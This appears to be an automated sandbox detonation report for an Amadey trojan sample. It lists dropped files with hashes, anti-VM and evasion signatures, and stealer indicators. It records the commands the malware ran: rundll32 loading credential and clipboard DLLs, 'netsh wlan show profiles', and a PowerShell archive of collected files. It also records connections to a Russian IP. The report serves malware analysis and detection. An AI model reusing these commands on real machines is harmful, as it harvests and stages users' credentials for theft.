SHA256 776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea
SHA512 fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

memory/6584-816-0x0000000000400000-0x0000000002C46000-memory.dmp

C:\Users\Admin\Pictures\Btf5cq1Bmhr53WKazgbpOEpg.exe

MD5 d981fb3fc1f28bea729db051c75dae08
SHA1 d5eea12045a6d998da1a362f70748fc09874d0b4
SHA256 aa5689332012817778e4ef3602e918297c567c4d573b463f86e8d98fef2eb48f
SHA512 a93576bc04ac5b1ba129913c3d4e5100cf7f0f8bd7a4c9a21ce3af645624890006e087eefa5d0cbd804b7b96ebc13cf32a722b8c1d66d409879f41d5bfa974cb

C:\Users\Admin\AppData\Local\Temp\tmp5652.tmp

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\Pictures\afis2GlxSRlazYtAhh6nmdeH.exe

MD5 6f427feb73b8016226f7710e90f11d70
SHA1 a1b987b130aff8b5e77f67e61150e5310c3573de
SHA256 0db7b50a542b6c23adcc8be759e2a1002598864f120b5858e8158c9c9c649f2d
SHA512 3bb6c0119274a775d08f744bb195aa24ebb640bae79489a1354aa712be6de61f32358f9a86057bb1fb781a1c35924fe4a065f227dcecbf5cd0aef216c6213806

C:\Users\Admin\AppData\Local\Temp\tmp5631.tmp

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

memory/6644-905-0x0000000140000000-0x000000014075E000-memory.dmp

memory/2452-908-0x00000000009A0000-0x0000000000E62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u4a4.1.zip

MD5 78d3ca6355c93c72b494bb6a498bf639
SHA1 2fa4e5df74bfe75c207c881a1b0d3bc1c62c8b0e
SHA256 a1dd547a63b256aa6a16871ed03f8b025226f7617e67b8817a08444df077b001
SHA512 1b2df7bee2514aee7efd3579f5dd33c76b40606d07dba69a34c45747662fad61174db4931bca02b058830107959205e889fee74f8ccc9f6e03f9fd111761f4ea

C:\Users\Admin\AppData\Local\Temp\u4a4.2\run.exe

MD5 9fb4770ced09aae3b437c1c6eb6d7334
SHA1 fe54b31b0db8665aa5b22bed147e8295afc88a03
SHA256 a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3
SHA512 140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256

memory/6292-992-0x0000000000400000-0x0000000003005000-memory.dmp

memory/6632-1019-0x0000000010000000-0x0000000013BC3000-memory.dmp

memory/6328-1050-0x0000000000400000-0x0000000003005000-memory.dmp

memory/7228-1076-0x0000000069590000-0x000000006970B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u52w.2\bunch.dat

MD5 1e8237d3028ab52821d69099e0954f97
SHA1 30a6ae353adda0c471c6ed5b7a2458b07185abf2
SHA256 9387488f9d338e211be2cb45109bf590a5070180bc0d4a703f70d3cb3c4e1742
SHA512 a6406d7c18694ee014d59df581f1f76e980b68e3361ae680dc979606a423eba48d35e37f143154dd97fe5f066baf0ea51a2e9f8bc822d593e1cba70ead6559f3

memory/7228-1090-0x00007FFB45450000-0x00007FFB45645000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u52w.2\UIxMarketPlugin.dll

MD5 d1ba9412e78bfc98074c5d724a1a87d6
SHA1 0572f98d78fb0b366b5a086c2a74cc68b771d368
SHA256 cbcea8f28d8916219d1e8b0a8ca2db17e338eb812431bc4ad0cb36c06fd67f15
SHA512 8765de36d3824b12c0a4478c31b985878d4811bd0e5b6fba4ea07f8c76340bd66a2da3490d4871b95d9a12f96efc25507dfd87f431de211664dbe9a9c914af6f

C:\Users\Admin\AppData\Local\Temp\u52w.2\whale.dbf

MD5 a723bf46048e0bfb15b8d77d7a648c3e
SHA1 8952d3c34e9341e4425571e10f22b782695bb915
SHA256 b440170853bdb43b66497f701aee2901080326975140b095a1669cb9dee13422
SHA512 ca8ea2f7f3c7af21b5673a0a3f2611b6580a7ed02efa2cfd8b343eb644ff09682bde43b25ef7aab68530d5ce31dcbd252c382dd336ecb610d4c4ebde78347273

C:\Users\Admin\AppData\Local\Temp\u52w.2\relay.dll

MD5 10d51becd0bbce0fab147ff9658c565e
SHA1 4689a18112ff876d3c066bc8c14a08fd6b7b7a4a
SHA256 7b2db9c88f60ed6dd24b1dec321a304564780fdb191a96ec35c051856128f1ed
SHA512 29faf493bb28f7842c905adc5312f31741effb09f841059b53d73b22aea2c4d41d73db10bbf37703d6aeb936ffacbc756a3cc85ba3c0b6a6863ef4d27fefcd29

memory/5548-1091-0x0000000000400000-0x0000000002C46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u4a4.3.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/1916-1152-0x0000000000400000-0x0000000003005000-memory.dmp

memory/3272-1178-0x0000000069590000-0x000000006970B000-memory.dmp

memory/5068-1163-0x0000000000400000-0x0000000003005000-memory.dmp

memory/3272-1182-0x00007FFB45450000-0x00007FFB45645000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS7124.tmp\Install.exe

MD5 e77964e011d8880eae95422769249ca4
SHA1 8e15d7c4b7812a1da6c91738c7178adf0ff3200f
SHA256 f200984380d291051fc4b342641cd34e7560cadf4af41b2e02b8778f14418f50
SHA512 8feb3dc4432ec0a87416cbc75110d59efaf6504b4de43090fc90286bd37f98fc0a5fb12878bb33ac2f6cd83252e8dfd67dd96871b4a224199c1f595d33d4cade

memory/5128-1218-0x0000000140000000-0x0000000140712000-memory.dmp

memory/7228-1226-0x0000000069590000-0x000000006970B000-memory.dmp

memory/5548-1224-0x0000000000400000-0x0000000002C46000-memory.dmp

memory/7364-1225-0x0000000000400000-0x0000000002C22000-memory.dmp

memory/6292-1230-0x0000000000400000-0x0000000003005000-memory.dmp

memory/6328-1231-0x0000000000400000-0x0000000003005000-memory.dmp

memory/6584-1236-0x0000000000400000-0x0000000002C46000-memory.dmp

memory/3272-1239-0x0000000069590000-0x000000006970B000-memory.dmp

memory/7024-1259-0x00007FFB45450000-0x00007FFB45645000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS7124.tmp\charmap.exe

MD5 e35a9d0f7ce4eac01063af580938d567
SHA1 b56cb9f141c3a307f339880c23d2b9ac8c177196
SHA256 a8891ead974a428655ee5f25d4976242fcb49918698addb06e029d6e5470e22a
SHA512 b9667316d038d80be4b1a1b8d3211f04c240117c9c6f9db028b882f9447c2658064cd79f3a34954afd524ed7718ad90b959f09308f82129b499d0cad5d0f8923

C:\Users\Admin\AppData\Local\Temp\7zS7124.tmp\BitLockerWizard.exe

MD5 ff14495654c9db0b82481cf562cf70d2
SHA1 b610e43426b934e9c90acfed213638c64d24fc13
SHA256 a7f666489614c94c8677f159d7bd3edbb210df77f94acd6e68979b1dd0ea2649
SHA512 e77d1a90a8f762839b01c05b59006d82c9b588a78db8d1e78f0bd0e5774ea50ef6fcec4ce7298b6952026e6ae3b48c8c381c917c01420fc9c8f000d0236d9917

C:\Users\Admin\AppData\Local\Temp\7zS7124.tmp\atieah64.exe

MD5 bbd4e96b91fcf16a38da733c6939d47f
SHA1 66073fff85d4fbd9de5102c70096c7dbb4ff5a6e
SHA256 5fd16e242c136447fb7b0ffbd8cbff3635b05c94cd90af3f1e99fad7ef6295e5
SHA512 9adeceb309c33217b2e4a5dfe343306fabd4fc2b62d9ba860f52bc6af84d6f7f078890b7d0e7dd4d54467315c2426722c77485419e6b40f5acced27472b71729

C:\Users\Admin\AppData\Local\Temp\7zS7124.tmp\AppVNice.exe

MD5 0b6cde84d57c866473357ff6915961f7
SHA1 dc701582d291e8128c6a5d6c981d7857f4357a64
SHA256 14f631bb8112f04d38dc3bdbfbc6641cad0fa2e6ef5d09211396f126eacb2869
SHA512 3c5bf3caa0a9b6e6009b4503776cdb610ad060fe22b34d567da8862391fb7fe5a6270037fd507be74f3e8b783c5ca9eef2cbf410e62943f5d9a7329eb8e265f8

C:\Users\Admin\AppData\Local\Temp\7zS7124.tmp\amdfendrsr.exe

MD5 5e18b81a9f038cd2e6ac3a9ffbde9b5d
SHA1 7150f9b2b238b5b2c3573c66c4741831e941a1e6
SHA256 523bcc22c0380ffa1aaf4bbf29808b1ad9c9f532e0405b923cc51000eb875fbd
SHA512 f55a8b158d8385c3eaba5fd2159b1e66859b6318a5ec5e221283349a584b5c63a306215d483b300fb1fb019c9fa8ae25d75d9c80b0ad33d25e41d10ce47447a7

C:\Users\Admin\AppData\Local\Temp\7zS7124.tmp\agentactivationruntimestarter.exe

MD5 cbcf178f0c9a0cca3d88f2a46bca0d58
SHA1 789b4712bdc99583a9a5770a620bb6d87051f34b
SHA256 95539fc4b845de78db0d44d414bab07bd420f83cc42bb6ed5bc3d0f35124a405
SHA512 babe0613c92ccdf30302afa03b63f06c3073705cebe471a621635d38bb8a9f55ece8eb9c4e60913a17352f64c466a20f7bb58ff9971302895b39f0a6050c4609

memory/1916-1262-0x0000000000400000-0x0000000003005000-memory.dmp

memory/5068-1264-0x0000000000400000-0x0000000003005000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251726281\opera_package

MD5 b7e7c07657383452919ee39c5b975ae8
SHA1 2a6463ac1eb8be1825b123b12f75c86b7fff6591
SHA256 1d3f55e541be41e98341cb1d7b5d10487f886093370bdccdb26c70c322246bb9
SHA512 daeabc9a4d76e1107681e96b1371682fa6dd589001f8b03fe41165d5c32a96179daeac359f86772c9768fdbdee271c16f92ad0dbd10b2fc7cde3970f0c92aa39

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251726281\additional_file0.tmp

MD5 15d8c8f36cef095a67d156969ecdb896
SHA1 a1435deb5866cd341c09e56b65cdda33620fcc95
SHA256 1521c69f478e9ced2f64b8714b9e19724e747cd8166e0f7ab5db1151a523dda8
SHA512 d6f48180d4dcb5ba83a9c0166870ac00ea67b615e749edf5994bc50277bf97ca87f582ac6f374c5351df252db73ee1231c943b53432dbb7563e12bbaf5bb393a

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 167f615dc2822850f3f8b3515478dc45
SHA1 95d14f28e6e6429e75f76d23480bbb1ccd123018
SHA256 3392491c914a738a9c0e479f002fc6db3fa5ba5cf8b5d94c26e49ce5586bd26b
SHA512 9696df4f5b8b6b3c52d8b01a371a22bbf117f3c47c5702b33382c785fb3286861c1168262c8a97b54311099a8551693061dbb84d8b4f19f4a2e2657fe12d716f

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 becd87c02ef3571e1a7755ae15f6f57b
SHA1 ba2ee0f3634d408aea141011ffc7e8e00b1301c9
SHA256 25243cb6b1150eb72231512378a2727ed088a897281602bef96c450dee044dfb
SHA512 06e297ee1144be5d80c5486b438b17a9e4167d9a48e4891bd8216262ec3185a0ff33b513de837a730c651b5555f2de603d0856cce10c9711c1fb1774d2cab88a

C:\Users\Admin\AppData\Local\Temp\tmp421.tmp

MD5 49693267e0adbcd119f9f5e02adf3a80
SHA1 3ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256 d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512 b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-25 17:25

Reported

2024-04-25 17:27

Platform

win11-20240412-en

Max time kernel

145s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe"

Signatures

Amadey

trojan amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads local data of messenger clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\chrosha.job C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe

"C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe"

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\777591257247_Desktop.zip' -CompressionLevel Optimal

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.190.18.2.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
RU 193.233.132.167:80 193.233.132.167 tcp
RU 193.233.132.167:80 193.233.132.167 tcp
RU 193.233.132.167:80 193.233.132.167 tcp

Files

memory/4476-0-0x0000000000EB0000-0x0000000001372000-memory.dmp

memory/4476-1-0x00000000777F6000-0x00000000777F8000-memory.dmp

memory/4476-2-0x0000000000EB0000-0x0000000001372000-memory.dmp

memory/4476-4-0x0000000005810000-0x0000000005811000-memory.dmp

memory/4476-3-0x0000000005800000-0x0000000005801000-memory.dmp

memory/4476-6-0x0000000005830000-0x0000000005831000-memory.dmp

memory/4476-7-0x00000000057D0000-0x00000000057D1000-memory.dmp

memory/4476-5-0x00000000057F0000-0x00000000057F1000-memory.dmp

memory/4476-8-0x00000000057E0000-0x00000000057E1000-memory.dmp

memory/4476-9-0x0000000005860000-0x0000000005861000-memory.dmp

memory/4476-10-0x0000000005850000-0x0000000005851000-memory.dmp

memory/4476-15-0x0000000000EB0000-0x0000000001372000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe

MD5 8facf6d258ba6125d842d5e0d5469bfb
SHA1 4374fc7f57ea001165cdcf36bbc6f6015203ef05
SHA256 217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854
SHA512 41c9e23c7b29c8901bd7fcf3932f44144116faa5505c33e0572d4c2b6ef687ddda8b77559cc4187007abcdb74620d1740c3075b9601c39a700a17f792555de8f

memory/1932-18-0x0000000000D30000-0x00000000011F2000-memory.dmp

memory/1932-19-0x0000000000D30000-0x00000000011F2000-memory.dmp

memory/1932-20-0x0000000005640000-0x0000000005641000-memory.dmp

memory/1932-21-0x0000000005650000-0x0000000005651000-memory.dmp

memory/1932-22-0x0000000005670000-0x0000000005671000-memory.dmp

memory/1932-23-0x0000000005610000-0x0000000005611000-memory.dmp

memory/1932-24-0x0000000005630000-0x0000000005631000-memory.dmp

memory/1932-25-0x0000000005620000-0x0000000005621000-memory.dmp

memory/1932-26-0x00000000056A0000-0x00000000056A1000-memory.dmp

memory/1932-27-0x0000000005690000-0x0000000005691000-memory.dmp

memory/1932-28-0x0000000000D30000-0x00000000011F2000-memory.dmp

C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll

MD5 f35b671fda2603ec30ace10946f11a90
SHA1 059ad6b06559d4db581b1879e709f32f80850872
SHA256 83e3df5bec15d5333935bea8b719a6d677e2fb3dc1cf9e18e7b82fd0438285c7
SHA512 b5fa27d08c64727cef7fdda5e68054a4359cd697df50d70d1d90da583195959a139066a6214531bbc5f20cd4f9bc1ca3e4244396547381291a6a1d2df9cf8705

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_531baetu.ovt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5032-49-0x0000021CCF470000-0x0000021CCF492000-memory.dmp

memory/5032-50-0x00007FFF14B10000-0x00007FFF155D2000-memory.dmp

memory/5032-51-0x0000021CB7110000-0x0000021CB7120000-memory.dmp

memory/1932-52-0x0000000000D30000-0x00000000011F2000-memory.dmp

memory/5032-53-0x0000021CB7110000-0x0000021CB7120000-memory.dmp

memory/5032-54-0x0000021CCF650000-0x0000021CCF662000-memory.dmp

memory/5032-55-0x0000021CCF460000-0x0000021CCF46A000-memory.dmp

memory/5032-61-0x00007FFF14B10000-0x00007FFF155D2000-memory.dmp

memory/1932-62-0x0000000000D30000-0x00000000011F2000-memory.dmp

memory/1932-63-0x0000000000D30000-0x00000000011F2000-memory.dmp

C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll

MD5 154c3f1334dd435f562672f2664fea6b
SHA1 51dd25e2ba98b8546de163b8f26e2972a90c2c79
SHA256 5f431129f97f3d56929f1e5584819e091bd6c854d7e18503074737fc6d79e33f
SHA512 1bca69bbcdb7ecd418769e9d4befc458f9f8e3cee81feb7316bb61e189e2904f4431e4cc7d291e179a5dec441b959d428d8e433f579036f763bbad6460222841

memory/1932-75-0x0000000000D30000-0x00000000011F2000-memory.dmp

memory/1932-76-0x0000000000D30000-0x00000000011F2000-memory.dmp

memory/1932-77-0x0000000000D30000-0x00000000011F2000-memory.dmp

memory/1932-78-0x0000000000D30000-0x00000000011F2000-memory.dmp

memory/1932-79-0x0000000000D30000-0x00000000011F2000-memory.dmp

memory/1932-80-0x0000000000D30000-0x00000000011F2000-memory.dmp

memory/1932-81-0x0000000000D30000-0x00000000011F2000-memory.dmp

memory/1932-82-0x0000000000D30000-0x00000000011F2000-memory.dmp